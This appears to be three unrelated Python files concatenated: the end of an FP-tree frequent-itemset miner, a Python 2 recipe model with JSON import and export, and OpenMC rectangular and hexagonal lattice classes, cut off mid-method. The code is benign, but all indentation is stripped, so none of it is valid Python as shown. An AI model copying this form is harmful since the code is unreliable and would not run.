condition_tree, condition_header_table = create_tree(condition_path, min_support)
if condition_header_table != None:
mine_tree(condition_tree, condition_header_table, min_support, new_freq_set, freqitem_list, support_list)
def resultlist2dict(freqitem_list, support_list):
result_list = []
len_result = len(freqitem_list)
support_data = {}
max_element_number = 0
for i in range(len_result):
support_data.update({frozenset(freqitem_list[i]): support_list[i]})
if max_element_number < len(freqitem_list[i]):
max_element_number = len(freqitem_list[i])
for k in range(max_element_number):
c = []
tmp_list = freqitem_list.copy()
for freqset in tmp_list:
if len(freqset) == k+1:
c.append(frozenset(freqset))
freqitem_list.remove(freqset)
result_list.append(c)
return result_list, support_data
def fptree(dataset, min_support):
data_len = len(dataset)
dataset_dict = create_init_set(dataset)
FPtree, header_table = create_tree(dataset_dict, min_support)
freqitem_list = []
support_list = []
mine_tree(FPtree, header_table, min_support, set([]), freqitem_list, support_list)
result_list, support_data = resultlist2dict(freqitem_list, support_list)
for i in support_data:
support_data[i] = support_data[i]/data_len
return result_list, support_data
if __name__ == '__main__':
filename = '/home/freestyle4568/lesson/Clothes-match-txt/user_catset.txt'
fr = open(filename)
dataset = []
for line in fr.readlines():
catset = line.split()[1]
dataset.append(catset.split(','))
for i in range(10):
print(dataset[i])
dataset = load_simple_data()
result_list, support_data = fptree(dataset, 3)
for i in result_list:
print(i)
print(len(support_data))
for j in support_data.items():
print(j)
|
###############################################################################
#
# recipemodel.py
#
# Provides the class model for a recipe. The class model is passed around in
# the application proper.
#
###############################################################################
import simplejson as json
class RecipeModel():
def export_recipe(self):
"""
This function exports the current recipe object as a JSON-encoded
recipe (.rcpe) file.
Actually just returns a JSON-encoded string
"""
# Dump the object into a JSON-formatted string
json_recipe = json.dumps({"name":self.name,"course":self.course,
"serving_size":self.servingSize,"ingredients":self.ingredients,
"instructions":self.instructions,"images":self.images},
separators=(',',':'))
# Return the string
return json_recipe
def import_recipe(self, raw_json):
"""
Parses a JSON-encoded .rcpe file and then sets it to itself.
The string containing the [contents] of the JSON file is passed into
this function.
"""
# Put the decoded JSON string into a "raw" recipe object
raw_recipe = json.loads(raw_json)
print raw_recipe # print it for now
self.name = raw_recipe['name']
self.course = raw_recipe['course']
self.servingSize = raw_recipe['serving_size']
self.ingredients = raw_recipe['ingredients']
self.instructions = raw_recipe['instructions']
self.images = raw_recipe['images']
def print_recipe_information(self):
"""
A useful debugging function that prints the entirety of the recipe
"""
# Print basic information
print '\nName: ' + self.name
print 'Course: ' + self.course
print 'Serving Size: ' + str(self.servingSize)
# Print the ingredients
print '\nIngredients:'
if len(self.ingredients) == 0:
print 'No ingredients.'
else:
for ingredient in self.ingredients:
print(ingredient['name'] + str(ingredient['quantity']) +
ingredient['unit'])
# Print the instructions
print '\nInstructions:'
if len(self.instructions) == 0:
print 'No instructions.'
else:
for instruction in self.instructions:
print instruction
# Print the filepaths of the images
print '\nImage paths:'
if len(self.images) == 0:
print 'No images.'
else:
for filePath in self.images:
print filePath
def get_recipe(self, recipe):
"""
Assigns a given recipe to this recipe.
"""
self.name = recipe.name
self.course = recipe.course
self.servingSize = recipe.servingSize
self.ingredients = recipe.ingredients
self.instructions = recipe.instructions
def __init__(self):
self.name = 'noname'
self.course = 'none'
self.servingSize = 0
self.ingredients = []
self.instructions = []
self.images = []
|
from abc import ABCMeta
from collections import OrderedDict
from collections.abc import Iterable
from copy import deepcopy
from math import sqrt, floor
from numbers import Real, Integral
from xml.etree import ElementTree as ET
import numpy as np
import openmc.checkvalue as cv
import openmc
from openmc.mixin import IDManagerMixin
class Lattice(IDManagerMixin, metaclass=ABCMeta):
"""A repeating structure wherein each element is a universe.
Parameters
----------
lattice_id : int, optional
Unique identifier for the lattice. If not specified, an identifier will
automatically be assigned.
name : str, optional
Name of the lattice. If not specified, the name is the empty string.
Attributes
----------
id : int
Unique identifier for the lattice
name : str
Name of the lattice
pitch : Iterable of float
Pitch of the lattice in each direction in cm
outer : openmc.Universe
A universe to fill all space outside the lattice
universes : Iterable of Iterable of openmc.Universe
A two- or three-dimensional list/array of universes filling each element
of the lattice
"""
next_id = 1
used_ids = openmc.Universe.used_ids
def __init__(self, lattice_id=None, name=''):
# Initialize Lattice class attributes
self.id = lattice_id
self.name = name
self._pitch = None
self._outer = None
self._universes = None
@property
def name(self):
return self._name
@property
def pitch(self):
return self._pitch
@property
def outer(self):
return self._outer
@property
def universes(self):
return self._universes
@name.setter
def name(self, name):
if name is not None:
cv.check_type('lattice name', name, str)
self._name = name
else:
self._name = ''
@outer.setter
def outer(self, outer):
cv.check_type('outer universe', outer, openmc.Universe)
self._outer = outer
@staticmethod
def from_hdf5(group, universes):
"""Create lattice from HDF5 group
Parameters
----------
group : h5py.Group
Group in HDF5 file
universes : dict
Dictionary mapping universe IDs to instances of
:class:`openmc.Universe`.
Returns
-------
openmc.Lattice
Instance of lattice subclass
"""
lattice_id = int(group.name.split('/')[-1].lstrip('lattice '))
name = group['name'].value.decode() if 'name' in group else ''
lattice_type = group['type'].value.decode()
if lattice_type == 'rectangular':
dimension = group['dimension'][...]
lower_left = group['lower_left'][...]
pitch = group['pitch'][...]
outer = group['outer'].value
universe_ids = group['universes'][...]
# Create the Lattice
lattice = openmc.RectLattice(lattice_id, name)
lattice.lower_left = lower_left
lattice.pitch = pitch
# If the Universe specified outer the Lattice is not void
if outer >= 0:
lattice.outer = universes[outer]
# Build array of Universe pointers for the Lattice
uarray = np.empty(universe_ids.shape, dtype=openmc.Universe)
for z in range(universe_ids.shape[0]):
for y in range(universe_ids.shape[1]):
for x in range(universe_ids.shape[2]):
uarray[z, y, x] = universes[universe_ids[z, y, x]]
# Use 2D NumPy array to store lattice universes for 2D lattices
if len(dimension) == 2:
uarray = np.squeeze(uarray)
uarray = np.atleast_2d(uarray)
# Set the universes for the lattice
lattice.universes = uarray
elif lattice_type == 'hexagonal':
n_rings = group['n_rings'].value
n_axial = group['n_axial'].value
center = group['center'][...]
pitch = group['pitch'][...]
outer = group['outer'].value
universe_ids = group['universes'][...]
# Create the Lattice
lattice = openmc.HexLattice(lattice_id, name)
lattice.center = center
lattice.pitch = pitch
# If the Universe specified outer the Lattice is not void
if outer >= 0:
lattice.outer = universes[outer]
# Build array of Universe pointers for the Lattice. Note that
# we need to convert between the HDF5's square array of
# (x, alpha, z) to the Python API's format of a ragged nested
# list of (z, ring, theta).
uarray = []
for z in range(n_axial):
# Add a list for this axial level.
uarray.append([])
x = n_rings - 1
a = 2*n_rings - 2
for r in range(n_rings - 1, 0, -1):
# Add a list for this ring.
uarray[-1].append([])
# Climb down the top-right.
for i in range(r):
uarray[-1][-1].append(universe_ids[z, a, x])
x += 1
a -= 1
# Climb down the right.
for i in range(r):
uarray[-1][-1].append(universe_ids[z, a, x])
a -= 1
# Climb down the bottom-right.
for i in range(r):
uarray[-1][-1].append(universe_ids[z, a, x])
x -= 1
# Climb up the bottom-left.
for i in range(r):
uarray[-1][-1].append(universe_ids[z, a, x])
x -= 1
a += 1
# Climb up the left.
for i in range(r):
uarray[-1][-1].append(universe_ids[z, a, x])
a += 1
# Climb up the top-left.
for i in range(r):
uarray[-1][-1].append(universe_ids[z, a, x])
x += 1
# Move down to the next ring.
a -= 1
# Convert the ids into Universe objects.
uarray[-1][-1] = [universes[u_id]
for u_id in uarray[-1][-1]]
# Handle the degenerate center ring separately.
u_id = universe_ids[z, a, x]
uarray[-1].append([universes[u_id]])
# Add the universes to the lattice.
if len(pitch) == 2:
# Lattice is 3D
lattice.universes = uarray
else:
# Lattice is 2D; extract the only axial level
lattice.universes = uarray[0]
return lattice
def get_unique_universes(self):
"""Determine all unique universes in the lattice
Returns
-------
universes : collections.OrderedDict
Dictionary whose keys are universe IDs and values are
:class:`openmc.Universe` instances
"""
univs = OrderedDict()
for k in range(len(self._universes)):
for j in range(len(self._universes[k])):
if isinstance(self._universes[k][j], openmc.Universe):
u = self._universes[k][j]
univs[u._id] = u
else:
for i in range(len(self._universes[k][j])):
u = self._universes[k][j][i]
assert isinstance(u, openmc.Universe)
univs[u._id] = u
if self.outer is not None:
univs[self.outer._id] = self.outer
return univs
def get_nuclides(self):
"""Returns all nuclides in the lattice
Returns
-------
nuclides : list of str
List of nuclide names
"""
nuclides = []
# Get all unique Universes contained in each of the lattice cells
unique_universes = self.get_unique_universes()
# Append all Universes containing each cell to the dictionary
for universe in unique_universes.values():
for nuclide in universe.get_nuclides():
if nuclide not in nuclides:
nuclides.append(nuclide)
return nuclides
def get_all_cells(self):
"""Return all cells that are contained within the lattice
Returns
-------
cells : collections.OrderedDict
Dictionary whose keys are cell IDs and values are :class:`Cell`
instances
"""
cells = OrderedDict()
unique_universes = self.get_unique_universes()
for universe_id, universe in unique_universes.items():
cells.update(universe.get_all_cells())
return cells
def get_all_materials(self):
"""Return all materials that are contained within the lattice
Returns
-------
materials : collections.OrderedDict
Dictionary whose keys are material IDs and values are
:class:`Material` instances
"""
materials = OrderedDict()
# Append all Cells in each Cell in the Universe to the dictionary
cells = self.get_all_cells()
for cell_id, cell in cells.items():
materials.update(cell.get_all_materials())
return materials
def get_all_universes(self):
"""Return all universes that are contained within the lattice
Returns
-------
universes : collections.OrderedDict
Dictionary whose keys are universe IDs and values are
:class:`Universe` instances
"""
# Initialize a dictionary of all Universes contained by the Lattice
# in each nested Universe level
all_universes = OrderedDict()
# Get all unique Universes contained in each of the lattice cells
unique_universes = self.get_unique_universes()
# Add the unique Universes filling each Lattice cell
all_universes.update(unique_universes)
# Append all Universes containing each cell to the dictionary
for universe_id, universe in unique_universes.items():
all_universes.update(universe.get_all_universes())
return all_universes
def get_universe(self, idx):
r"""Return universe corresponding to a lattice element index
Parameters
----------
idx : Iterable of int
Lattice element indices. For a rectangular lattice, the indices are
given in the :math:`(x,y)` or :math:`(x,y,z)` coordinate system. For
hexagonal lattices, they are given in the :math:`x,\alpha` or
:math:`x,\alpha,z` coordinate systems.
Returns
-------
openmc.Universe
Universe with given indices
"""
idx_u = self.get_universe_index(idx)
if self.ndim == 2:
return self.universes[idx_u[0]][idx_u[1]]
else:
return self.universes[idx_u[0]][idx_u[1]][idx_u[2]]
def find(self, point):
"""Find cells/universes/lattices which contain a given point
Parameters
----------
point : 3-tuple of float
Cartesian coordinates of the point
Returns
-------
list
Sequence of universes, cells, and lattices which are traversed to
find the given point
"""
idx, p = self.find_element(point)
if self.is_valid_index(idx):
u = self.get_universe(idx)
else:
if self.outer is not None:
u = self.outer
else:
return []
return [(self, idx)] + u.find(p)
def clone(self, memo=None):
"""Create a copy of this lattice with a new unique ID, and clones
all universes within this lattice.
Parameters
----------
memo : dict or None
A nested dictionary of previously cloned objects. This parameter
is used internally and should not be specified by the user.
Returns
-------
clone : openmc.Lattice
The clone of this lattice
"""
if memo is None:
memo = {}
# If no nemoize'd clone exists, instantiate one
if self not in memo:
clone = deepcopy(self)
clone.id = None
if self.outer is not None:
clone.outer = self.outer.clone(memo)
# Assign universe clones to the lattice clone
for i in self.indices:
if isinstance(self, RectLattice):
clone.universes[i] = self.universes[i].clone(memo)
else:
if self.ndim == 2:
clone.universes[i[0]][i[1]] = \
self.universes[i[0]][i[1]].clone(memo)
else:
clone.universes[i[0]][i[1]][i[2]] = \
self.universes[i[0]][i[1]][i[2]].clone(memo)
# Memoize the clone
memo[self] = clone
return memo[self]
class RectLattice(Lattice):
"""A lattice consisting of rectangular prisms.
To completely define a rectangular lattice, the
:attr:`RectLattice.lower_left` :attr:`RectLattice.pitch`,
:attr:`RectLattice.outer`, and :attr:`RectLattice.universes` properties need
to be set.
Most methods for this class use a natural indexing scheme wherein elements
are assigned an index corresponding to their position relative to the
(x,y,z) axes in a Cartesian coordinate system, i.e., an index of (0,0,0) in
the lattice gives the element whose x, y, and z coordinates are the
smallest. However, note that when universes are assigned to lattice elements
using the :attr:`RectLattice.universes` property, the array indices do not
correspond to natural indices.
Parameters
----------
lattice_id : int, optional
Unique identifier for the lattice. If not specified, an identifier will
automatically be assigned.
name : str, optional
Name of the lattice. If not specified, the name is the empty string.
Attributes
----------
id : int
Unique identifier for the lattice
name : str
Name of the lattice
pitch : Iterable of float
Pitch of the lattice in the x, y, and (if applicable) z directions in
cm.
outer : openmc.Universe
A universe to fill all space outside the lattice
universes : Iterable of Iterable of openmc.Universe
A two- or three-dimensional list/array of universes filling each element
of the lattice. The first dimension corresponds to the z-direction (if
applicable), the second dimension corresponds to the y-direction, and
the third dimension corresponds to the x-direction. Note that for the
y-direction, a higher index corresponds to a lower physical
y-value. Each z-slice in the array can be thought of as a top-down view
of the lattice.
lower_left : Iterable of float
The Cartesian coordinates of the lower-left corner of the lattice. If
the lattice is two-dimensional, only the x- and y-coordinates are
specified.
indices : list of tuple
A list of all possible (z,y,x) or (y,x) lattice element indices. These
indices correspond to indices in the :attr:`RectLattice.universes`
property.
ndim : int
The number of dimensions of the lattice
shape : Iterable of int
An array of two or three integers representing the number of lattice
cells in the x- and y- (and z-) directions, respectively.
"""
def __init__(self, lattice_id=None, name=''):
super().__init__(lattice_id, name)
# Initialize Lattice class attributes
self._lower_left = None
def __repr__(self):
string = 'RectLattice\n'
string += '{0: <16}{1}{2}\n'.format('\tID', '=\t', self._id)
string += '{0: <16}{1}{2}\n'.format('\tName', '=\t', self._name)
string += '{0: <16}{1}{2}\n'.format('\tShape', '=\t',
self.shape)
string += '{0: <16}{1}{2}\n'.format('\tLower Left', '=\t',
self._lower_left)
string += '{0: <16}{1}{2}\n'.format('\tPitch', '=\t', self._pitch)
if self._outer is not None:
string += '{0: <16}{1}{2}\n'.format('\tOuter', '=\t',
self._outer._id)
else:
string += '{0: <16}{1}{2}\n'.format('\tOuter', '=\t',
self._outer)
string += '{0: <16}\n'.format('\tUniverses')
# Lattice nested Universe IDs - column major for Fortran
for i, universe in enumerate(np.ravel(self._universes)):
string += '{0} '.format(universe._id)
# Add a newline character every time we reach end of row of cells
if (i+1) % self.shape[0] == 0:
string += '\n'
string = string.rstrip('\n')
return string
@property
def indices(self):
if self.ndim == 2:
return list(np.broadcast(*np.ogrid[
:self.shape[1], :self.shape[0]]))
else:
return list(np.broadcast(*np.ogrid[
:self.shape[2], :self.shape[1], :self.shape[0]]))
@property
def _natural_indices(self):
"""Iterate over all possible (x,y) or (x,y,z) lattice element indices.
This property is used when constructing distributed cell and material
paths. Most importantly, the iteration order matches that used on the
Fortran side.
"""
if self.ndim == 2:
nx, ny = self.shape
return np.broadcast(*np.ogrid[:nx, :ny])
else:
nx, ny, nz = self.shape
return np.broadcast(*np.ogrid[:nx, :ny, :nz])
@property
def lower_left(self):
return self._lower_left
@property
def ndim(self):
if self.pitch is not None:
return len(self.pitch)
else:
raise ValueError('Number of dimensions cannot be determined until '
'the lattice pitch has been set.')
@property
def shape(self):
return self._universes.shape[::-1]
@lower_left.setter
def lower_left(self, lower_left):
cv.check_type('lattice lower left corner', lower_left, Iterable, Real)
cv.check_length('lattice lower left corner', lower_left, 2, 3)
self._lower_left = lower_left
@Lattice.pitch.setter
def pitch(self, pitch):
cv.check_type('lattice pitch', pitch, Iterable, Real)
cv.check_length('lattice pitch', pitch, 2, 3)
for dim in pitch:
cv.check_greater_than('lattice pitch', dim, 0.0)
self._pitch = pitch
@Lattice.universes.setter
def universes(self, universes):
cv.check_iterable_type('lattice universes', universes, openmc.Universe,
min_depth=2, max_depth=3)
self._universes = np.asarray(universes)
def find_element(self, point):
"""Determine index of lattice element and local coordinates for a point
Parameters
----------
point : Iterable of float
Cartesian coordinates of point
Returns
-------
2- or 3-tuple of int
A tuple of the corresponding (x,y,z) lattice element indices
3-tuple of float
Carestian coordinates of the point in the corresponding lattice
element coordinate system
"""
ix = floor((point[0] - self.lower_left[0])/self.pitch[0])
iy = floor((point[1] - self.lower_left[1])/self.pitch[1])
if self.ndim == 2:
idx = (ix, iy)
else:
iz = floor((point[2] - self.lower_left[2])/self.pitch[2])
idx = (ix, iy, iz)
return idx, self.get_local_coordinates(point, idx)
def get_local_coordinates(self, point, idx):
"""Determine local coordinates of a point within a lattice element
Parameters
----------
point : Iterable of float
Cartesian coordinates of point
idx : Iterable of int
(x,y,z) indices of lattice element. If the lattice is 2D, the z
index can be omitted.
Returns
-------
3-tuple of float
Cartesian coordinates of point in the lattice element coordinate
system
"""
x = point[0] - (self.lower_left[0] + (idx[0] + 0.5)*self.pitch[0])
y = point[1] - (self.lower_left[1] + (idx[1] + 0.5)*self.pitch[1])
if self.ndim == 2:
z = point[2]
else:
z = point[2] - (self.lower_left[2] + (idx[2] + 0.5)*self.pitch[2])
return (x, y, z)
def get_universe_index(self, idx):
"""Return index in the universes array corresponding to a lattice element index
Parameters
----------
idx : Iterable of int
Lattice element indices in the :math:`(x,y,z)` coordinate system
Returns
-------
2- or 3-tuple of int
Indices used when setting the :attr:`RectLattice.universes` property
"""
max_y = self.shape[1] - 1
if self.ndim == 2:
x, y = idx
return (max_y - y, x)
else:
x, y, z = idx
return (z, max_y - y, x)
def is_valid_index(self, idx):
"""Determine whether lattice element index is within defined range
Parameters
----------
idx : Iterable of int
Lattice element indices in the :math:`(x,y,z)` coordinate system
Returns
-------
bool
Whether index is valid
"""
if self.ndim == 2:
return (0 <= idx[0] < self.shape[0] and
0 <= idx[1] < self.shape[1])
else:
return (0 <= idx[0] < self.shape[0] and
0 <= idx[1] < self.shape[1] and
0 <= idx[2] < self.shape[2])
def create_xml_subelement(self, xml_element):
# Determine if XML element already contains subelement for this Lattice
path = './lattice[@id=\'{0}\']'.format(self._id)
test = xml_element.find(path)
# If the element does contain the Lattice subelement, then return
if test is not None:
return
lattice_subelement = ET.Element("lattice")
lattice_subelement.set("id", str(self._id))
if len(self._name) > 0:
lattice_subelement.set("name", str(self._name))
# Export the Lattice cell pitch
pitch = ET.SubElement(lattice_subelement, "pitch")
pitch.text = ' '.join(map(str, self._pitch))
# Export the Lattice outer Universe (if specified)
if self._outer is not None:
outer = ET.SubElement(lattice_subelement, "outer")
outer.text = '{0}'.format(self._outer._id)
self._outer.create_xml_subelement(xml_element)
# Export Lattice cell dimensions
dimension = ET.SubElement(lattice_subelement, "dimension")
dimension.text = ' '.join(map(str, self.shape))
# Export Lattice lower left
lower_left = ET.SubElement(lattice_subelement, "lower_left")
lower_left.text = ' '.join(map(str, self._lower_left))
# Export the Lattice nested Universe IDs - column major for Fortran
universe_ids = '\n'
# 3D Lattices
if self.ndim == 3:
for z in range(self.shape[2]):
for y in range(self.shape[1]):
for x in range(self.shape[0]):
universe = self._universes[z][y][x]
# Append Universe ID to the Lattice XML subelement
universe_ids += '{0} '.format(universe._id)
# Create XML subelement for this Universe
universe.create_xml_subelement(xml_element)
# Add newline character when we reach end of row of cells
universe_ids += '\n'
# Add newline character when we reach end of row of cells
universe_ids += '\n'
# 2D Lattices
else:
for y in range(self.shape[1]):
for x in range(self.shape[0]):
universe = self._universes[y][x]
# Append Universe ID to Lattice XML subelement
universe_ids += '{0} '.format(universe._id)
# Create XML subelement for this Universe
universe.create_xml_subelement(xml_element)
# Add newline character when we reach end of row of cells
universe_ids += '\n'
# Remove trailing newline character from Universe IDs string
universe_ids = universe_ids.rstrip('\n')
universes = ET.SubElement(lattice_subelement, "universes")
universes.text = universe_ids
# Append the XML subelement for this Lattice to the XML element
xml_element.append(lattice_subelement)
class HexLattice(Lattice):
r"""A lattice consisting of hexagonal prisms.
To completely define a hexagonal lattice, the :attr:`HexLattice.center`,
:attr:`HexLattice.pitch`, :attr:`HexLattice.universes`, and
:attr:`HexLattice.outer` properties need to be set.
Most methods for this class use a natural indexing scheme wherein elements
are assigned an index corresponding to their position relative to skewed
:math:`(x,\alpha,z)` axes as described fully in
:ref:`hexagonal_indexing`. However, note that when universes are assigned to
lattice elements using the :attr:`HexLattice.universes` property, the array
indices do not correspond to natural indices.
Parameters
----------
lattice_id : int, optional
Unique identifier for the lattice. If not specified, an identifier will
automatically be assigned.
name : str, optional
Name of the lattice. If not specified, the name is the empty string.
Attributes
----------
id : int
Unique identifier for the lattice
name : str
Name of the lattice
pitch : Iterable of float
Pitch of the lattice in cm. The first item in the iterable specifies the
pitch in the radial direction and, if the lattice is 3D, the second item
in the iterable specifies the pitch in the axial direction.
outer : openmc.Universe
A universe to fill all space outside the lattice
universes : Nested Iterable of openmc.Universe
A two- or three-dimensional list/array of universes filling each element
of the lattice. Each sub-list corresponds to one ring of universes and
should be ordered from outermost ring to innermost ring. The universes
within each sub-list are ordered from the "top" and proceed in a
clockwise fashion. The :meth:`HexLattice.show_indices` method can be
used to help figure out indices for this property.
center : Iterable of float
Coordinates of the center of the lattice. If the lattice does not have
axial sections then only the x- and y-coordinates are specified
indices : list of tuple
A list of all possible (z,r,i) or (r,i) lattice element indices that are
possible, where z is the axial index, r is in the ring index (starting
from the outermost ring), and i is the index with a ring starting from
the top and proceeding clockwise.
num_rings : int
Number of radial ring positions in the xy-plane
num_axial : int
Number of positions along the z-axis.
"""
def __init__(self, lattice_id=None, name=''):
super().__init__(lattice_id, name)
# Initialize Lattice class attributes
self._num_rings = None
self._num_axial = None
self._center = None
def __repr__(self):
string = 'HexLattice\n'
string += '{0: <16}{1}{2}\n'.format('\tID', '=\t', self._id)
string += '{0: <16}{1}{2}\n'.format('\tName', '=\t', self._name)
string += '{0: <16}{1}{2}\n'.format('\t# Rings', '=\t', self._num_rings)
string += '{0: <16}{1}{2}\n'.format('\t# Axial', '=\t', self._num_axial)
string += '{0: <16}{1}{2}\n'.format('\tCenter', '=\t',
self._center)
string += '{0: <16}{1}{2}\n'.format('\tPitch', '=\t', self._pitch)
if self._outer is not None:
string += '{0: <16}{1}{2}\n'.format('\tOuter', '=\t',
self._outer._id)
else:
string += '{0: <16}{1}{2}\n'.format('\tOuter', '=\t',
self._outer)
string += '{0: <16}\n'.format('\tUniverses')
if self._num_axial is not None:
slices = [self._repr_axial_slice(x) for x in self._universes]
string += '\n'.join(slices)
else:
string += self._repr_axial_slice(self._universes)
return string
@property
def num_rings(self):
return self._num_rings
@property
def num_axial(self):
return self._num_axial
@property
def center(self):
return self._center
@property
def indices(self):
if self.num_axial is None:
return [(r, i) for r in range(self.num_rings)
for i in range(max(6*(self.num_rings - 1 - r), 1))]
else:
return [(z, r, i) for z in range(self.num_axial)
for r in range(self.num_rings)
for i in range(max(6*(self.num_rings - 1 - r), 1))]
@property
def _natural_indices(self):
"""Iterate over all possible (x,alpha) or (x,alpha,z) lattice element
indices.
This property is used when constructing distributed cell and material
paths. Most importantly, the iteration order matches that used on the
Fortran side.
"""
r = self.num_rings
if self.num_axial is None:
for a in range(-r + 1, r):
for x in range(-r + 1, r):
idx = (x, a)
if self.is_valid_index(idx):
yield idx
else:
for z in range(self.num_axial):
for a in range(-r + 1, r):
for x in range(-r + 1, r):
idx = (x, a, z)
if self.is_valid_index(idx):
yield idx
@property
def ndim(self):
return 2 if isinstance(self.universes[0][0], openmc.Universe) else 3
@center.setter
def center(self, center):
cv.check_type('lattice center', center, Iterable, Real)
cv.check_length('lattice center', center, 2, 3)
self._center = center
@Lattice.pitch.setter
def pitch(self, pitch):
cv.check_type('lattice pitch', pitch, Iterable, Real)
cv.check_length('lattice pitch', pitch, 1, 2)
for dim in pitch:
cv.check_greater_than('lattice pitch', dim, 0)
self._pitch = pitch
@Lattice.universes.setter
def universes(self, universes):
cv.check_iterable_type('lattice universes', universes, openmc.Universe,
min_depth=2, max_depth=3)
self._universes = universes
# NOTE: This routine assumes that the user creates a "ragged" list of
# lists, where each sub-list corresponds to one ring of Universes.
# The sub-lists are ordered from outermost ring to innermost ring.
# The Universes within each sub-list are ordered from the "top" in a
# clockwise fashion.
# Set the number of axial positions.
if self.ndim == 3:
self._num_axial = len(self._universes)
else:
self._num_axial = None
# Set the number of rings and make sure this number is consistent for
# all axial positions.
if self.ndim == 3:
self._num_rings = len(self._universes[0])
for rings in self._universes:
if len(rings) != self._num_rings:
msg = 'HexLattice ID={0:d} has an inconsistent number of ' \
'rings per axial positon'.format(self._id)
raise ValueError(msg)
else:
self._num_rings = len(self._universes)
# Make sure there are the correct number of elements in each ring.
if self.ndim == 3:
for axial_slice in self._universes:
# Check the center ring.
if len(axial_slice[-1]) != 1:
msg = 'HexLattice ID={0:d} has the wrong number of ' \
'elements in the innermost ring. Only 1 element is ' \
'allowed in the innermost ring.'.format(self._id)
raise ValueError(msg)
# Check the outer rings.
for r in range(self._num_rings-1):
if len(axial_slice[r]) != 6*(self._num_rings - 1 - r):
msg = 'HexLattice ID={0:d} has the wrong number of ' \
'elements in ring number {1:d} (counting from the '\
'outermost ring). This ring should have {2:d} ' \
'elements.'.format(self._id, r,
6*(self._num_rings - 1 - r))
raise ValueError(msg)
else:
axial_slice = self._universes
# Check the center ring.
if len(axial_slice[-1]) != 1:
msg = 'HexLattice ID={0:d} has the wrong number of ' \
'elements in the innermost ring. Only 1 element is ' \
'allowed in the innermost ring.'.format(self._id)
raise ValueError(msg)
# Check the outer rings.
for r in range(self._num_rings-1):
if len(axial_slice[r]) != 6*(self._num_rings - 1 - r):
msg = 'HexLattice ID={0:d} has the wrong number of ' \
'elements in ring number {1:d} (counting from the '\
'outermost ring). This ring should have {2:d} ' \
'elements.'.format(self._id, r,
6*(self._num_rings - 1 - r))
raise ValueError(msg)
def find_element(self, point):
r"""Determine index of lattice element and local coordinates for a point
Parameters
----------
point : Iterable of float
Cartesian coordinates of point
Returns
-------
3-tuple of int
Indices of corresponding lattice element in :math:`(x,\alpha,z)`
bases
numpy.ndarray
Carestian coordinates of the point in the corresponding lattice
element coordinate system
"""
# Convert coordinates to skewed bases
x = point[0] - self.center[0]
y = point[1] - self.center[1]
if self._num_axial is None:
iz = 1
else:
z = point[2] - self.center[2]
iz = floor(z/self.pitch[1] + 0.5*self.num_axial)
alpha = y - x/sqrt(3.)
ix = floor(x/(sqrt(0.75) * self.pitch[0]))
ia = floor(alpha/self.pitch[0])
# Check four lattice elements to see which one is closest based on local
# coordinates
d_min = np.inf
for idx in [(ix, ia, iz), (ix + 1, ia, iz), (ix, ia + 1, iz),
(ix + 1, ia + 1, iz)]:
p = self.get_local_coordinates(point, idx)
d = p[0]**2 + p[1]**2
if d < d_min:
d_min = d
idx_min = idx
p_min = p
return idx_min, p_min
def get_local_coordinates(self, point, idx):
r"""Determine local coordinates of a point within a lattice element
Parameters
----------
point : Iterable of float
Cartesian coordinates of point
idx : Iterable of int
Indices of lattice element in :math:`(x,\alpha,z)` bases
Returns
-------
3-tuple of float
Cartesian coordinates of point in the lattice element coordinate
system
"""
x = point[0] - (self.center[0] + sqrt(0.75)*self.pitch[0]*idx[0])
y = point[1] - (self.center[1] + (0.5*idx[0] + idx[1])*self.pitch[0])
if self._num_axial is None:
z = point[2]
else:
z = point[2] - (self.center[2] + (idx[2] + 0.5 - 0.5*self.num_axial)*
self.pitch[1])
return (x, y, z)
def get_universe_index(self, idx):
r"""Return index in the universes array corresponding to a lattice element index
Parameters
----------
idx : Iterable of int
Lattice element indices in the :math:`(x,\alpha,z)` coordinate
system
Returns
-------
2- or 3-tuple of int
Indices used when setting the :attr:`HexLattice.universes` property
"""
# First we determine which ring the index corresponds to.
x = idx[0]
a = idx[1]
z = -a - x
g = max(abs(x), abs(a), abs(z))
# Next we use a clever method to figure out where along the ring we are.
i_ring = self._num_rings - 1 - g
if x >= 0:
if a >= 0:
i_within = x
else:
i_within = 2*g + z
else:
if a <= 0:
i_within = 3*g - x
else:
i_within = 5*g - z
if self.num_axial is None:
return (i_ring, i_within)
else:
return (idx[2], i_ring, i_within)
def is_valid_index(self, idx):
r"""Determine whether lattice element index is within defined range
Parameters
----------
idx : Iterable of int
Lattice element indices in the :math:`(x,\alpha,z)` coordinate
system
Returns
-------
bool
Whether index is valid
"""
x = idx[0]
y = idx[1]
z = 0 - y - x
g = max(abs(x), abs(y), abs(z))
if self.num_axial is None:
return g < self.num_rings
else:
return g < self.num_rings and 0 <= idx[2] < self.num_axial
def create_xml_subelement(self, xml_element):
# Determine if XML element already contains subelement for this Lattice
path = './hex_lattice[@id=\'{0}\']'.format(self._id)
test = xml_element.find(path)
# If the element does contain the Lattice subelement, then return
if test is not None:
return
lattice_subelement = ET.Element("hex_lattice")
lattice_subelement.set("id", str(self._id))
if len(self._name) > 0:
lattice_subelement.set("name", str(self._name))
# Export the Lattice cell pitch
pitch = ET.SubElement(lattice_subelement, "pitch")
pitch.text = ' '.join(map(str, self._pitch))
# Export the Lattice outer Universe (if specified)
if self._outer is not None:
outer = ET.SubElement(lattice_subelement, "outer")
outer.text = '{0}'.format(self._outer._id)
self._outer.create_xml_subelement(xml_element)
lattice_subelement.set("n_rings", str(self._num_rings))
if self._num_axial is not None:
lattice_subelement.set("n_axial", str(self._num_axial))
# Export Lattice cell center
center = ET.SubElement(lattice_subelement, "center")
center.text = ' '.join(map(str, self._center))
# Export the Lattice nested Universe IDs.
# 3D Lattices
if self._num_axial is not None:
slices = []
for z in range(self._num_axial):
# Initialize the center universe.
universe = self._universes[z][-1][0]
universe.create_xml_subelement(xml_element)
# Initialize the remaining universes.
for r in range(self._num_rings-1):
for theta in range(6*(self._num_rings - 1 - r)):
universe = self._universes[z][r][theta]
universe.create_xml_subelement(xml_element)
# Get a string representation of the universe IDs.
slices.append(self._repr_axial_slice(self._universes[z]))
# Collapse the list of axial slices into a single string.
universe_ids = '\n'.join(slices)
# 2D Lattices
else:
# Initialize the center universe.
universe = self._universes[-1][0]
universe.create_xml_subelement(xml_element)
# Initialize the remaining universes.
for r in range(self._num_rings - 1):
for theta in range(6*(self._num_rings - 1 - r)):
universe = self._universes[r][theta]
universe.create_xml_subelement(xml_element)
# Get a string representation of the universe IDs.
universe_ids = self._repr_axial_slice(self._universes)
universes = ET.SubElement(lattice_subelement, "universes")
universes.text = '\n' + universe_ids
# Append the XML subelement for this Lattice to the XML element
